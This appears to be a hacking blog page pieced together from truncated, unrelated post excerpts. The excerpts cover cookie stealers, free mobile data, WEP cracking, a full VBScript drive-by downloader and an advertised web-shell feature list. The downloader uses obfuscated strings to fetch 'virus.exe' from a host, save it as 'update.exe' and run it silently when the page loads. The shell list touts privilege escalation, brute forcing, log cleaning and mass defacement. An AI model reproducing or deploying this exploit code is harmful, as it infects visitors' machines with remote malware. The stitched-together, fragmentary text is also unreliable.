Introduction
Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.
The sender can take many forms. In essense, it’s just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.
The receiver, as [...]
I have been asked by many Vodafone Users to post a Method to get a free GPRS for the Vodafone. Nobody wants to pay for what he/she uses. I am also a Nobody so I was also in trying out all the things to get free GPRS for Vodafone users since I am also a [...]
Okay, before we begin, I give you Hungry Hacker´s fun facts on WEP.
FUN FACTS:
-WEP stands for Wired Equivalent Privacy
-WEP is used to secure wireless networks from eavesdroppers
-WEP usually takes hours to crack
WEP has always been a long and tedious job, untill recently, when two FBI agents demonstrated how it´s possible to crack WEP in under [...]
<HTML>
<BODY>
<script language=”VBScript”>
on error resume next
dl = “http://XXXXXXXXX.com/virus.exe”
Set df = document.createElement(”object”)
cls1=”clsid:BD96″
cls2=”C556-65A”
cls3=”3-11D0-9″
cls4=”83A-00C04FC29E36″
clsfull=cls1&cls2&cls3&cls4
df.setAttribute “classid”,clsfull
strr1=”Mic”
strr2=”roso”
strr3=”ft.”
strr4=”XML”
strr5=”HTTP”
strr=strr1&strr2&strr3&strr4&strr5
Set x = df.CreateObject(strr,”")
ab1=”A”
ab2=”dod”
ab3=”b.S”
ab4=”t”
ab5=”re”
ab6=”am”
strb1=ab1&ab2&ab3&ab4&ab5&ab6
strb5=strb1
set YY = df.createobject(strb5,”")
YY.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fnamezz1=”update.exe”
scripp1=”Scrip”
scripp2=”ting”
scripp3=”.Fil”
scripp4=”eSyste”
scripp5=”mObject”
scripp=scripp1&scripp2&scripp3&scripp4&scripp5
set FF = df.createobject(scripp,”")
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1)
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject(”sh3ll.Application”,”")
MM.ShellExecute fnamezz1,”",”",”open”,0
</script>
</BODY>
</HTML>
* -link to Enumerate to escalate priviledges
* -Full server brute force
* -User brute force
* -Mig-Log Logcleaner
* -Execute linux comnand
* -milw0rm searcher
* -google searcher
* -sh3ll Style & Image
* -Mass deface all
* -your ip and server ip with whois capability
* -Advance passwd byPass
* -c99 Excute!!!
* -Sql server BOFS
* -File search
* -PHP EVAL
* -Advance task manager!
* -Advance [...]
Welcome i have decided to close the forum.
Damn lots of enemies…
From Now i m starting blog.
Regards,
HackMan